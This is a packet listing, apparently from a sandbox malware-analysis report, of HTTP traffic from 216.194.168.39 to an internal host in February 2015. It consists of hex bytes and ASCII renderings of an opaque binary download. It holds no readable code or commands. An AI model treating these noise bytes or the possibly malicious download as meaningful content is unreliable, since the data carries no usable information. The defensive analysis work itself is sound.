Data Ascii: J{%xl>%YLP_tSBlg\*cUL"/vf:f?P>2Lgh}>qkO9|J7d?-LF&T=b>%f1y,$O*2rLK{npo_d8AGx| >*
148
Feb 19, 2015 13:01:59.331008911 MEZ801032216.194.168.39192.168.1.10Data Raw: 6e e1 a1 ae f0 49 8d 1d bd 04 68 2d 7e bf 4d d5 10 4a 63 26 58 d8 c2 ac d8 37 e3 78 b7 3d a8 ad 36 11 0c 88 3e df 0c 88 4a 76 49 88 3f 5d eb 95 bd 73 8f 7f 3e 69 9c ce e8 51 e0 65 6c 57 fa fe b0 a1 8b cb 0f 02 4d 4d a9 57 11 29 35 47 35 ac 2e f5
Data Ascii: nIh-~MJc&X7x=6>JvI?]s>iQelWMMW)5G5.K<Qe{McBG#z>dggTau\{MEZK,%o-$aQmn3>TM~HmSZ>>Csw_ NM,@x^m:7<o`MqMb
150
Feb 19, 2015 13:01:59.331031084 MEZ801032216.194.168.39192.168.1.10Data Raw: 5d a8 4e 94 75 a9 84 27 2e 6b 5c ac 2d 25 31 3c 19 2a 7f 27 3e d9 e8 da 80 aa 76 5d ea bc ef 15 3a e5 44 f4 97 7e 4e 49 52 19 72 7a 3f 80 0e ac 0f 00 7e ec 35 65 1f ef 3e be c4 76 ea 5b 9b 35 38 05 16 b5 53 42 88 95 c1 c2 b7 a9 3e dd 53 88 52 4f
Data Ascii: ]Nu'.k\-%1<*'>v]:D~NIRrz?~5e>v[58SB>SRO[z,VkN[1~<>Rsn-}kN}]VH$>Sk>(gK^>/|w|aNF%PS5Qc>7cldZ-[HN0l.BQ'N
151
Feb 19, 2015 13:01:59.331273079 MEZ801032216.194.168.39192.168.1.10Data Raw: f5 d0 37 d8 b1 23 5c 3b b8 c6 f9 59 39 80 56 b8 81 23 e9 a9 15 6a 1b 6f 80 28 52 fc a6 e6 f6 ef ef b4 50 81 ce fe 10 40 c5 4f 6d ac 6c fe 85 e3 17 e7 54 6a 3d 80 53 05 3d 43 67 1d df 76 80 ac 0b 7b 5d 73 70 07 34 04 3e d4 1e db e7 19 49 e1 3c 36
Data Ascii: 7#\;Y9V#jo(RP@OmlTj=S=Cgv{]sp4>I<6]{stP^as82R)Kb2>e9_Ub>}D>8L`Pbe-Pgm$l8S7>jE,#UQh%QwPUJqt?rQ>{$XtP0&%D;F
152
Feb 19, 2015 13:01:59.336451054 MEZ801032216.194.168.39192.168.1.10Data Raw: 21 64 51 cf 53 7a 4f ad eb 4e dc ac f1 3c 70 89 a4 4e 8d de 3f 14 46 20 55 a8 0a 11 da 36 51 26 36 87 42 3e 79 fa 95 ac b2 17 cc 0f b0 39 5c b0 3e 27 b0 30 88 75 1b 96 63 18 10 c7 73 ab fc e1 7e 27 51 ce 5a 7e 16 bc c6 f8 6c ac 23 1a cb 25 c0 50
Data Ascii: !dQSzON<pN?F U6Q&6B>y9\>'0ucs~'QZ~l#%PI1>Y86%4<)MtA>4" ,](T9(SE,6Z)>v\()/r@dQ@J75>3k(Sb8HYp[Q$}1u|E)Ff:C2.QGH=>L>tm
154
Feb 19, 2015 13:01:59.336469889 MEZ801032216.194.168.39192.168.1.10Data Raw: 19 a0 d7 2e c1 6e f7 20 3e bb c3 f9 98 a3 6f 01 3f 1b 3e 98 b9 8c 94 63 3b b4 57 13 3e f2 f7 8d 44 a2 11 b1 0e 80 54 5d 2c 9e fa fa b8 b9 52 3b 09 c5 26 63 23 0e 37 ac 46 64 c4 e8 59 9e 01 2d 3e c9 74 3a cc 93 b9 df a9 89 4e 79 3f 2e 19 a2 35 0f
Data Ascii: .n >o?>c;W>DT],R;&c#7FdY->t:Ny?.5vW;eR4F9XHP>S9#}r>8R\lmRQIE\\t>}]uzRtzl}NERaEZ:opd>p1s//Q
155
Feb 19, 2015 13:01:59.336472988 MEZ801032216.194.168.39192.168.1.10Data Raw: d1 84 6a 76 3e 3c d1 2b 16 41 11 16 88 e7 d7 84 68 32 c6 c9 73 fb 53 3b 9f 52 d4 ea 58 5e 59 8c 65 3a 00 30 ee 36 42 a5 1a ee f0 b5 c2 b6 6a de b3 21 53 0b d6 a7 a1 d9 30 97 f6 ac 12 1f af e4 53 3a b8 cf 1e 36 ed 0d b5 9a 48 a3 9b d2 53 9a da 0f
Data Ascii: jv><+Ah2sS;RX^Ye:06Bj!S0S:6HS>o9o>IA~_"3/(>fn-T(\v8#_>g4W\gTS+i^.txB\qjTUcLNe 1c{oTmzlCv
156
Feb 19, 2015 13:01:59.336680889 MEZ801032216.194.168.39192.168.1.10Data Raw: 55 37 32 9b e8 ee f1 60 14 e1 3e 6f fb 7b 97 27 91 fd da 65 9b 2e e5 aa 92 11 2f 0e 54 74 02 bf 16 b1 85 42 44 ac 39 01 8f 88 c7 7d 56 b0 3e 81 8b 76 53 67 94 aa 4c 6c 8d 17 37 02 b5 95 29 fb 1b ac 5b e9 f1 32 5c 38 71 45 3e 0e ad 62 d5 3e ad 22
Data Ascii: U72`>o{'e./TtBD9}V>vSgLl7)[2\8qE>b>"urBAK}>0{|R0;iT/21!Y.y]T+;J-'>4t/u*T7^[,/\W4OUhT@inlIID>dGF'm
157
Feb 19, 2015 13:01:59.336698055 MEZ801032216.194.168.39192.168.1.10Data Raw: cd 23 ba 31 55 d6 4c 2d 46 4b 17 49 9a ac d4 a0 08 ac c2 20 d6 0f fe fa 56 da 8e 77 cf 43 3a 3c 51 ac c1 95 64 93 b3 ce c6 99 3e 91 dc 21 3c d6 4b 2d b9 da 4b 1f c8 7a a4 36 11 c3 55 ff 44 79 30 c3 1e 8a c8 ac ca eb 9a 66 14 89 a8 97 3e da 57 04
Data Ascii: #1UL-FKI VwC:<Qd>!<K-Kz6UDy0f>W:IsnlU-7{QQ,:<Ew)Gm:~>-xf1JP\:<QbQ:l%FTU+5mHs6G>y>oWVBq}MmU>+e/A6z(F
159
Feb 19, 2015 13:01:59.336812973 MEZ801032216.194.168.39192.168.1.10Data Raw: 21 ac 28 79 59 58 8a 11 54 b1 1e 28 a7 5d 06 3a 8c a0 60 27 57 4a d3 ab 68 57 ae c5 5b ac d4 b1 45 c7 4a 59 0f 29 3e 02 0b 91 75 15 7c cd 24 56 b3 86 8b 51 0b c4 c5 ab 7b ac aa 5a 46 98 55 7a 34 4e 3e 40 eb cc 01 ac 4b 28 43 4d 9d 1b 80 aa 18 fd
Data Ascii: !(yYXT(]:`'WJhW[EJY)>u|$VQ{ZFUz4N>@K(CMWWrNJ{~>j.}Re]4c?RBR"X>v$G*%Xummv>e|dW]WWyg:/Q>fw7,imPe5}.W"^-* t)&W
160
Feb 19, 2015 13:01:59.342415094 MEZ801032216.194.168.39192.168.1.10Data Raw: 7c 7c c3 91 5e 59 53 ac 66 23 67 9e 7e ba 45 f0 3e 44 a3 be d3 2d 3b c9 bb 3d be cd f1 36 91 a8 a9 5b cf e7 3e de 21 c0 38 b3 19 ec db 36 5c d6 f1 ce 2f c2 82 72 58 12 7d eb bd 1e 05 37 37 ac 7a 90 12 9a 1e f0 b9 da 3e 7c 3d e4 0f da 19 fe 7e 3f
Data Ascii: ||^YSf#g~E>D-;=6[>!86\/rX}77z>|=~?w{EX#Gc;2X_lzD}Y>~{Wmyl@\Ml!RN%X2nzfgC8Nt(SI\a7\:M>@>`gXICbO/>^
161
Feb 19, 2015 13:01:59.365793943 MEZ801032216.194.168.39192.168.1.10Data Raw: 59 1e 50 f8 58 16 c1 b5 31 91 36 34 4e 6c 8c ce 5b c9 26 77 97 af f7 ae 58 05 26 9c 75 ed 19 f4 22 ac 85 dc fd ef 22 16 19 83 3e d2 7f 54 57 c7 8b aa 50 b4 12 7e 41 05 5e 23 73 11 58 b9 e1 ea 10 ed 6e ea 2e ac 0d 85 79 d1 22 e1 fe 1b 3e 2c 3e 41
Data Ascii: YPX164Nl[&wX&u"">TWP~A^#sXn.y">,>AHQ3XICp^8P-"XF*HJ4>7DhF>G`"^Xr'>hbS0>gP:,XqHf2ZU>E8,6
162
Feb 19, 2015 13:01:59.365814924 MEZ801032216.194.168.39192.168.1.10Data Raw: 6d cd a5 02 d2 d4 4c 16 fe 4b bf a8 2c ed 84 95 5a fc c5 84 01 a5 32 e6 18 ac f5 7b 17 73 7f 56 38 15 3e a0 0a 9f ae e8 1b 9b 2f 1f f9 b9 8f 07 17 50 b7 ba 5a 92 82 01 11 e3 c9 41 8c ac f2 ad de b9 f8 48 a1 a3 3c 65 61 a7 a9 b3 5e e0 22 bf 5a db
Data Ascii: mLK,Z2{sV8>/PZAH<ea^"Zs&dh>}GP/nK!ZP.qz$1YZ{l?MP&<zZ(/;0>4#?Nd-Z9e[U6"xMZ-D$'V q>Q^NZJ%/O-<O
164
Feb 19, 2015 13:01:59.366023064 MEZ801032216.194.168.39192.168.1.10Data Raw: 0b 91 fd dd 7f ac 23 84 ac 08 c4 b2 b1 9e 0e ee 1b 29 64 d9 5e f5 3b bf 4b ac 92 56 35 94 40 c3 4f 36 3e 9b ee ed 4f ca f0 a6 0f 8c ba c1 21 d5 55 64 5a 06 5b 47 d0 8c b0 e1 9c f5 e9 ac 8d d1 bb ef 73 1f 13 31 3e c5 12 b0 16 f9 43 59 81 95 6d aa
Data Ascii: #)d^;KV5@O6>O!UdZ[Gs1>CYm>1[:Ch:]8aWA[ .Qx7L^OWj >SV5f>X}p2*;}[+^[vx'LFye>J|+}:^[sLV[BPS>[SU#82]6>1qN
165
Feb 19, 2015 13:01:59.432063103 MEZ801032216.194.168.39192.168.1.10Data Raw: 7f 3a 41 8c 22 17 5c 26 e7 a9 b9 09 1d 33 3c ac d4 ed 33 f0 48 8e d1 f8 3e 54 13 35 a9 19 5c da 86 7a 7e 02 7f ea 54 ce cb 56 5c fd e1 a1 40 4d d0 3f 7d ae c8 64 11 11 4f b1 55 ae 21 81 06 1d fb 8d 26 01 17 f9 5c cf 98 1c cb f7 b3 66 c1 ac 45 48
Data Ascii: :A"\&3<3H>T5\z~TV\@M?}dOU!&\fEH2=>u@L)jAe\]pmE6,(3Y A\R7*Kw8|>>+SM\+LH{Ch!8Z\,X6A2^G"\%jPF4
165
Feb 19, 2015 13:01:59.435595036 MEZ801032216.194.168.39192.168.1.10Data Raw: 1c 7d 3c 29 07 b5 52 c8 01 8e cc 7d 5c 0d 5b 84 0c 7a 7e 1f 53 ac ef bf b9 51 e3 9f 19 ed 3e 9e e9 26 37 0c ae fe 22 f8 1e 4a 17 9b 75 f6 6f ce 5c dc e3 31 a1 8a b9 f5 1c 8c a2 ea 03 3b 08 e5 48 bb c0 ff b0 cf 19 93 3e 7d 8f 62 5d 4e ab ed 17 a4
Data Ascii: }<)R}\[z~SQ>&7"Juo\1;H>}b]Np!>G('M|B*DIK]-f~Dy ;$]~c=QU#!wMAPk&]{KGCqA>mPG6jlQ],P1uG1t5>k'#)=kE
167
Feb 19, 2015 13:01:59.435612917 MEZ801032216.194.168.39192.168.1.10Data Raw: 89 b5 eb f5 13 a9 3e fc f2 9d fb c8 b8 83 f5 5f 13 11 b7 f7 28 2d 06 20 5e 97 8a bc 6a 1e 33 05 41 cc 71 c1 79 61 80 7a 5a b5 3a 90 5e d4 9d 2a 72 eb 66 4f cd ac 19 2a 86 8f d3 df 1e d3 3e 1c c2 d6 6e d6 49 8a 4a 6d 36 e9 eb e2 6e d3 df 33 5e ee
Data Ascii: >_(- ^j3AqyazZ:^*rfO*>nIJm6n3^zfw'2G;|[vcg)Q>ym6o{mso^{Bf(>:/g&J+0$^qD%c"I>l)!G^[=1u}ml><S6=q>ovf
168
Feb 19, 2015 13:01:59.435857058 MEZ801032216.194.168.39192.168.1.10Data Raw: 63 21 52 c9 d6 89 09 ac 9d ec da 01 5f 64 c8 91 e6 fb b3 80 74 ac 1c 7e fb ef b5 96 d5 b1 3e 06 1c 08 6d 12 1e 5c 43 92 5a cc 96 f9 76 90 a5 c5 ad ac 9f f0 7a 90 43 c1 1c e7 3e 80 7b 65 00 b2 c3 31 25 d9 26 fa 34 22 fe 64 9d 33 5f ae 89 ab 4f 91
Data Ascii: c!R_dt~>m\CZvzC>{e1%&4"d3_ONO^C>2pUKYy>[K$_K_#7@>g>'P~zn_uc$7hlUG!c-X_u!7>XBWs_D-Q w\ea7,
169
Feb 19, 2015 13:01:59.440133095 MEZ801032216.194.168.39192.168.1.10Data Raw: e5 4f d8 bd f9 68 b5 b2 3e 22 71 a5 7f dc 54 da af 49 a3 4f 2f 8e e4 ed 66 9d 60 79 cb 34 cc 86 21 82 98 ac 70 2b 10 87 0c ca 41 2a 7e c9 a1 09 46 2c 23 97 37 19 60 aa 71 c2 ea f9 cf c8 aa ac ba 83 23 49 11 c6 74 ed 3e 67 92 13 9f 8d 3c ed da 59
Data Ascii: Oh>"qTIO/f`y4!p+A*~F,#7`q#It>g<YL6~"`;hW#`>FPZbk]Qwwl`d~U{l@i1t`HHjeN>0J(g-rY=h^,3>e*KOy!yy`~.K~B&/>8F
170
Feb 19, 2015 13:01:59.440150976 MEZ801032216.194.168.39192.168.1.10Data Raw: 42 47 61 3a 60 a5 c2 63 f7 8e 60 6c 13 04 91 ed da ec ee a9 b7 b2 61 4a c4 c3 1c 5f 32 e9 19 ac 0c 51 1f 9e bd f9 07 91 3e 35 5c 24 78 d9 20 63 03 be 70 13 42 7f 4b 50 63 92 61 3f d8 40 b1 0f 87 0d b7 ac a7 80 a8 fd d5 8b ad de 3e 2d 0a 14 1e fe
Data Ascii: BGa:`c`laJ_2Q>5\$x cpBKPca?@>-m:>gV94>&_ar3/^,wH37[JA4. jB><tg%0ycqa?TB3u&F";!!>,gF_n92W(a0%N,
172
Feb 19, 2015 13:01:59.440154076 MEZ801032216.194.168.39192.168.1.10Data Raw: a5 78 63 a0 74 70 26 19 78 65 70 ac 5b fa 3c ff da be a5 cb be 69 82 da 6e 65 0c 55 e5 21 63 97 c1 08 21 37 71 97 52 ac 7e 34 67 9c 7f 0b 22 17 3e e8 5b 7f 39 d0 82 da 61 2d f6 ae 7f ed 1e 2a 7f ce 63 50 dc 71 6d 08 81 7b b2 ac b3 44 21 ff 7f 4b
Data Ascii: xctp&xep[<ineU!c!7qR~4g">[9a-*cPqm{D!K~3> :6t$f}_#iAo>_!,_B=BWqc_o/w*".?d:k%ocitsnH>H24MPcmLo]HaH:w4Qencrqq;||f
172
Feb 19, 2015 13:01:59.440890074 MEZ801032216.194.168.39192.168.1.10Data Raw: ae 45 6f ed 12 36 63 40 1c bd d0 2e 2d 6e 1f ac ae d6 53 41 7f cd c8 12 3c d3 d8 ab e8 04 57 50 c1 d7 63 00 5d 84 e7 0d 5b 6c 42 ac d1 a7 5f 6d a4 07 5c e7 3e f7 f8 09 d5 f9 22 cc fb a2 49 0f 50 d2 10 a3 6a a1 63 0b c2 1d 99 4b 9b 1b fd ac c7 68
Data Ascii: Eo6c@.-nSA<WPc][lB_m\>"IPjcKh#7g_ecE#>Zv0oc\*7%<3P(lckt"XN>(zl#nB|cT?@$<8;c53<
174
Feb 19, 2015 13:01:59.440907001 MEZ801032216.194.168.39192.168.1.10Data Raw: 16 02 65 8e 5f cf 86 cc 45 e6 d9 ac d9 42 f7 ab 0f 38 a8 9e 3e 2b ed 6b 87 69 79 af 7f 07 82 09 74 53 8c d7 72 00 66 d3 38 73 63 a2 88 0f ec d7 9c 0c 07 42 0b c9 ba 68 9c a2 65 98 96 16 71 d9 7c c2 05 ac bf 4c b5 d0 a9 3b 61 62 3e 7e 58 e3 f5 a6
Data Ascii: e_EB8>+kiytSrf8scBheq|L;ab>~Xg%VeGlWP79>Y3=SHHpc8`>U.#=/ce"x\_O\A>^+-_a+d-O1swe{zXyS4ue32-D
175
Feb 19, 2015 13:01:59.441046000 MEZ801032216.194.168.39192.168.1.10Data Raw: ee 91 fb 2e 65 6e c5 23 a9 5d 24 5d 1f 94 26 66 a1 e4 e1 2c 94 29 6c 3e 3e 69 26 31 81 1f 9f 02 96 75 66 ed d6 35 8f 1d cb bd 66 e9 7c c8 03 47 e5 7d a8 8c f7 77 e3 01 79 00 61 04 ec 7c b6 24 74 8e 3d a3 3f 79 66 1a a9 e8 5a 03 a6 39 fc ac 1d 68
Data Ascii: .en#]$]&f,)l>>i&1uf5f|G}wya|$t=?yfZ9h!>%'Gj 3fnU=>EA9<5@f@/^>Na53L>5:_Zmj\hfU7emb'6%fiR!GN";>+=f2+^v9n
176
Feb 19, 2015 13:01:59.444833040 MEZ801032216.194.168.39192.168.1.10Data Raw: 36 ac fe b8 f0 f8 64 a3 08 39 3e 09 82 c2 43 00 d4 b7 3c a2 81 38 c2 21 ab 42 31 c0 dd a8 3e e3 90 8f 9f 37 a7 93 65 67 5e 35 cf 09 58 20 8e 3f 67 a8 ab 4b c0 29 a2 a7 7a ac e5 1f e2 6e e8 a9 f9 ee 3e 4e 8d 71 4e ee 78 64 fb 70 15 13 0a 09 a8 20
Data Ascii: 6d9>C<8!B1>7eg^5X ?gK)zn>NqNxdp gGsg\GCdS|M>br+~uggFXS%&,U/>LHcEs9+naFNyU<22vkgSyV%a>2p'\5 g%
177
Feb 19, 2015 13:01:59.456792116 MEZ801032216.194.168.39192.168.1.10Data Raw: 3b e4 65 5b 24 14 67 f0 07 8f 84 ad aa 5a 44 ac df 39 c6 9b 85 ef dc 39 3e f0 42 f6 e7 1a 6a 6b 33 ee 4f 7d b1 e6 ee a9 8a 9d b2 1c 3e 4d da 8e 12 b5 7a 1e 3e e7 92 48 14 cb 3a 39 6b 33 67 e5 e6 a8 89 19 25 d6 27 ac 1e af 27 72 65 55 f7 e5 3e e9
Data Ascii: ;e[$gZD99>Bjk3O}>Mz>H:9k3g%''reU>e4|D!}Rg]~EJ[a8q~jb>'EvPq??ha<@FN;_>Zo+N7_W$*>xMv(DUh7sV\SL<>u)Q{
178
Feb 19, 2015 13:01:59.456813097 MEZ801032216.194.168.39192.168.1.10Data Raw: aa 64 10 ac 51 ac de fc 5f cc 00 8b 7e 5b 20 d1 41 51 6d 77 37 b8 69 50 a5 ae 35 fd d5 6a 9a ac a3 d8 7c e1 68 48 9a 7a 3e 75 fe 7e 3b 6d 70 ff 66 53 d6 af f9 69 5a ab 78 99 69 bd 74 be 48 34 16 ba f1 ac 3a 09 8f c2 51 20 ae 38 3e 29 44 b9 2c a1
Data Ascii: dQ_~[ AQmw7iP5j|hHz>u~;mpfSiZxitH4:Q 8>)D,z\}gw:NmDe>m\0nc+{[y)oK.<|n>79f<jHkPl\&iR+ewqcA_#ixf+N%E`>ym_zT9.iInCQK>|
180
Feb 19, 2015 13:01:59.457015038 MEZ801032216.194.168.39192.168.1.10Data Raw: d0 50 aa b2 a8 0c 24 a0 dd 29 6e 35 3a b7 7f 39 5d 1f 53 d3 9b b0 6a 42 89 34 8c f8 82 81 39 ac 11 54 6e 79 96 bb 98 44 3e 16 47 0e 6e 16 99 cb 59 c0 68 cc 1a ab e9 e2 78 e6 6c d4 51 c7 03 a8 fe 5d a3 07 72 c5 ab c9 3f 78 31 31 6b e5 6a b7 ec ef
Data Ascii: P$)n5:9]SjB49TnyD>GnYhxlQ]r?x11kj'dxk#O>KoHS6pq#>f[@k>j71#jy$=0n5fBC>\&hGDn:;>fZY(KjU\>p&;8u'JYC
181
Feb 19, 2015 13:01:59.533893108 MEZ801032216.194.168.39192.168.1.10Data Raw: d3 ac d8 95 25 f6 eb 27 19 5d 3e ca d4 5b c4 74 28 b6 49 29 8d ef bf 55 2c ab d8 b0 40 ac 32 96 e7 ab 99 3a b7 09 3e 84 8d 39 cc bb cc 48 61 b0 3b 21 ea 0d d3 d5 2e 97 6b f2 d8 1f 6c 2d 38 b1 f0 ac 17 8a 84 7c 63 9f d8 a2 7e c8 39 29 3e cf 94 37
Data Ascii: %']>[t(I)U,@2:>9Ha;!.kl-8|c~9)>7kf__ 9:>;MS#7%$KXiv5L>+,LWlke9:db>;UP|7e.p+w>n//-k+zs (>B>%6V5%
181
Feb 19, 2015 13:01:59.535803080 MEZ801032216.194.168.39192.168.1.10Data Raw: cf 7a 8c eb 05 17 ca ac 40 f8 95 1d 5a 8f e8 b4 3e 42 ae 16 ff e9 35 d7 84 27 a7 ad 51 bf 3e b1 6d f0 6c 79 4b ed 83 e8 a2 43 09 ac c7 b4 0e f5 55 d1 28 fb 3e fb 81 f3 58 3c 00 27 17 31 17 a0 b8 bf 6d 1d e5 68 f0 ac 2c e6 c9 e1 10 34 5c 52 3e 7f
Data Ascii: z@Z>B5'Q>mlyKCU(>X<'1mh,4\R>Ga'!:7OyxrzlJl[i9>8.,H?yf7@~C9r/)>nE@mG.0"lI,-;U>_tGP+*l*3}pW8,<lPMFL1pzX
183
Feb 19, 2015 13:01:59.535820007 MEZ801032216.194.168.39192.168.1.10Data Raw: 05 8e 3f ed e6 70 fa 07 77 77 6b 78 61 95 37 82 6c 8f da ad d0 93 b6 fe 58 a5 9f f8 8d 18 6d 67 78 ad f6 23 2e d0 82 ac b7 0e e0 29 f9 23 c8 b7 3e 31 20 a3 69 43 16 a3 af 9c d9 5b 89 d6 b0 8c 3d 2b 6b ca f1 9b a4 a8 dc 30 fa 92 9d a1 fc cb 66 c9
Data Ascii: ?pwwkxa7lXmgx#.)#>1 iC[=+k0fb.my((i2Gc=`nt1wE>nByl!cJC_b?i>cGm:YGG.a>k5Darm~Bnh?a>ZUMGk<U/b16>.
184
Feb 19, 2015 13:01:59.536017895 MEZ801032216.194.168.39192.168.1.10Data Raw: a0 a0 6c 06 a5 e4 6c 48 db 0a 01 8a 3e c6 0e b8 9b b5 67 e8 97 00 d1 3e 97 44 71 0f 93 46 6f c6 41 a2 99 6a bb 44 86 ac 47 42 0f e1 dc 20 be dc 3e 71 e7 72 61 ba 0b e5 b0 09 8e 7d 5a 18 a6 f6 f1 c6 6f 47 eb 06 22 09 23 fe 69 a4 4e c5 60 37 29 e2
Data Ascii: llH>g>DqFoAjDGB >qra}ZoG"#iN`7)Qo +`2` >Z)x(5[m}3->>$4#3 noH4T""n>)!b3!o|9EZ4.2m+o1\U`wP>x
185
Feb 19, 2015 13:01:59.538635015 MEZ801032216.194.168.39192.168.1.10Data Raw: 14 53 e7 65 98 e3 87 79 92 7a 04 e3 78 ab aa 28 6f a3 f6 1e a2 e7 bc 09 6b ec 96 2a a8 f1 84 d7 34 a7 7f 80 a7 a9 d6 08 22 48 9b 5c 6f 29 6d b6 a8 9b 7e 1f 22 ac 9a 82 8b 22 de f0 cd 49 3f 9b 5d ae 74 4f 62 49 88 da 6f 31 d8 d4 cc 29 5d b4 58 ac
Data Ascii: Seyzx(ok*4"H\o)m~""I?]tObIo1)]X?k}i>QVo73dk4w3>; ,7]Ws3z>S^Xm;Zso5 >r1-[Zrk8e^>!j^\Vo_6]
187
Feb 19, 2015 13:01:59.538641930 MEZ801032216.194.168.39192.168.1.10Data Raw: 70 ca 4d 66 4d a3 8f 22 71 ac 03 dc 7c 87 14 6b 96 be 3e 3c 68 e4 70 67 66 cc 54 eb 3c 3c 41 88 62 31 2c 48 b0 1f 33 9a 23 18 ec b0 74 f5 3a f0 75 8c 2e 8a 06 ee 72 57 70 91 30 61 81 57 17 73 c0 ac b6 3d 05 0e 40 0e 7a 4f be bf 3e 09 65 9a 87 07
Data Ascii: pMfM"q|k><hpgfT<<Ab1,H3#t:u.rWp0aWs=@zO>eqZ@#>-2>#Mob,}{"p'qVjJx>h9>f1]^k7#>!o@J)Aqa|L%@U>ruu?sN>-j!1fv!q^)8Hs/fp>
188
Feb 19, 2015 13:01:59.538645983 MEZ801032216.194.168.39192.168.1.10Data Raw: ba aa 76 4d 8c ac 15 06 ac 5f 08 c5 c1 5a 3e fd 18 20 08 cd 0c 2a c8 17 21 b4 8b bf 5c 99 22 15 cf ac 25 44 dc 8c 71 70 45 d7 3e 99 6b 7c af b1 3a 4b 4e 5e 12 ed 48 4c 7a 40 b8 ea 72 1a 08 4b a1 da 7e 76 3a ac 17 1c e0 08 29 59 ed 5c 3e 0a 4c 07
Data Ascii: vM_Z> *!\"%DqpE>k|:KN^HLz@rK~v:)Y\>LUc=g2J2.h&y">S.l?n%41wtr`\Unuz2>>b_w(@r[l)W.)0.d$~+ri5[ -+X#>Ysf3"$rYWS:
189
Feb 19, 2015 13:01:59.539542913 MEZ801032216.194.168.39192.168.1.10Data Raw: 0d b9 39 b4 33 f7 f4 17 72 8c 39 da 39 df b0 1a 58 ac d5 c0 da 75 15 28 03 ed 2e 3a eb d8 82 36 78 cd 82 e8 72 94 a3 98 78 46 de b3 2e ac 15 98 78 86 26 45 c0 00 3e 44 62 3b 12 41 23 e7 fb d5 ec ab f2 0b f6 94 35 ee 72 ff a4 ee 6d 7a 5f 42 7f ac
Data Ascii: 93r99Xu(.:6xrxF.x&E>Db;A#5rmz_B8B|r6U?EVpr/V1-(~WowW8r:?%TH>G?6){L0%^g,>$KA,W;3rO_&p]c1r).0l0T>*y#c
190
Feb 19, 2015 13:01:59.539558887 MEZ801032216.194.168.39192.168.1.10Data Raw: 7e 0e 2d 96 b6 ac 9b 77 c0 2b 55 fa 64 97 3e ea 76 e4 35 76 38 8c c6 38 37 ad 2e 8e 7e c9 9d e7 74 c3 a0 c9 b2 eb 11 18 18 ac f3 ab 7d 66 e8 06 e5 57 38 20 cb a8 24 e8 e4 f9 77 4d 39 ac be df e7 ee 2c 98 49 56 3e c1 86 96 72 e1 81 8e 9a 46 30 69
Data Ascii: ~-w+Ud>v5v887.~t}fW8 $wM9,IV>rF0izqpt6!>]_PxWt:?q;`2>9r.~T:2'>toK;VAg>Ojk*m]nSNcta9}q5;oOth/$orQ$io'hu5=#>1>0
192
Feb 19, 2015 13:01:59.539685011 MEZ801032216.194.168.39192.168.1.10Data Raw: 95 54 70 d2 6e a4 ea 45 05 ac 23 e3 af 61 8b 8e 4e 97 3e fb 98 2e e2 98 86 c6 f2 a6 62 ef 86 be 87 14 ee e6 75 2a 3a 31 57 e0 7f e9 81 a4 2e 96 2f d7 36 8d 98 a2 28 ad db a6 4e 6c e1 ad 6e bc 75 46 a5 9b fd 38 5b b8 6d ac 3d a1 3c 65 9e b7 d8 4c
Data Ascii: TpnE#aN>.bu*:1W./6(NlnuF8[m=<eL>%: Ku|l2<>vsYfPl}u>7~_:c\>I2*}|&CuYSIg.7u1}s&i2>^O#FGpJu2nCT% H
193
Feb 19, 2015 13:01:59.546384096 MEZ801032216.194.168.39192.168.1.10Data Raw: 1a 80 a7 a9 0c f8 2a 1f 09 aa 47 9d 5b bc 3e e6 d8 06 1d 07 ec e1 f1 9e c5 f9 cd 50 77 ab 2b d6 76 ed 63 a6 d7 aa 68 26 ed ac 8a d0 e3 13 1a 5f 48 8c 3e cf 0e 0f 28 1a 56 f8 81 a7 93 2d b8 29 fd 2e b4 4f 76 ec 7f 4d 0d 99 c1 0b 8a ac 12 88 22 8f
Data Ascii: *G[>Pw+vch&_H>(V-).OvM",Mp8?R?>P&^8vl)>6Vf>GumERQvLT|6 O-(vU\D*>?D7>j^n`E1T~v/7]
193
Feb 19, 2015 13:01:59.746504068 MEZ801032216.194.168.39192.168.1.10Data Raw: 1a 80 a7 a9 0c f8 2a 1f 09 aa 47 9d 5b bc 3e e6 d8 06 1d 07 ec e1 f1 9e c5 f9 cd 50 77 ab 2b d6 76 ed 63 a6 d7 aa 68 26 ed ac 8a d0 e3 13 1a 5f 48 8c 3e cf 0e 0f 28 1a 56 f8 81 a7 93 2d b8 29 fd 2e b4 4f 76 ec 7f 4d 0d 99 c1 0b 8a ac 12 88 22 8f
Data Ascii: *G[>Pw+vch&_H>(V-).OvM",Mp8?R?>P&^8vl)>6Vf>GumERQvLT|6 O-(vU\D*>?D7>j^n`E1T~v/7]
194
Feb 19, 2015 13:01:59.966924906 MEZ801032216.194.168.39192.168.1.10Data Raw: 33 a0 d7 2c 6e 75 3e ec 1d 56 01 03 cc 03 36 10 97 34 2a da 5f ef a1 4f f7 c6 7b ba 70 ff a8 3a 68 35 3f 9f 71 36 3a a4 7a 99 8d ee 77 86 df 4b 11 a8 6f 08 1a ac 81 4d 5a 24 30 79 7e 67 3e 34 53 51 d8 ce 9e 0d 10 1e a3 ae 44 7f 53 5e 2c 11 47 e4
Data Ascii: 3,nu>V64*_O{p:h5?q6:zwKoMZ$0y~g>4SQDS^,G^u#:s#rdwL>eikF{>knj;,Adt`bLwHEdB81)vg/>3$95:H_@}{~Bv=@?U<wJnBoo>Vt50
195
Feb 19, 2015 13:01:59.966950893 MEZ801032216.194.168.39192.168.1.10Data Raw: 78 9d 44 e7 1e c0 73 b3 b4 ac 9a 3e 54 9d b8 44 07 50 3e 56 4a 1f 82 69 94 66 fe 80 80 f4 d4 91 6a 18 83 e4 78 ff 9a 6a 84 bb e8 ec 2a ac a3 b3 4f cc b6 11 60 52 3e 34 ef e8 2d e8 b8 a5 dc 8d 68 1a c5 86 0e a6 12 59 bc ac 25 8b ea 8a ed b0 2d 1d
Data Ascii: xDs>TDP>VJifjxj*O`R>4-hY%->;]73p^}y>vG:F)}xgjK($:aq<b=>9*S,yfz%B$A>] 0+AT-6psd&>X"'2xc@#}>3ZS
197
Feb 19, 2015 13:01:59.967142105 MEZ801032216.194.168.39192.168.1.10Data Raw: 85 2c 3e b5 2c 6e 3e c1 36 ed 2f e9 cd 16 44 a4 28 8b 48 fa 79 4f 76 16 66 10 78 90 43 ac b8 e1 21 0f 23 f3 3a 36 3e b9 e1 39 ec cf a9 ad 61 c2 a0 b0 2c aa e6 1a d5 32 da 44 3e 0d 5d 52 05 31 34 63 a2 f7 76 0e 2e 1c 18 15 93 0b 79 99 3b 49 57 89
Data Ascii: ,>,n>6/D(HyOvfxC!#:6>9a,2D>]R14cv.y;IWw(i1UG">??+JeP;NSI!1xz[rStO"E05>`uC:zf>PRm[t@e>}-u7?">Xm9AfY&3zX,lC|\E9
198
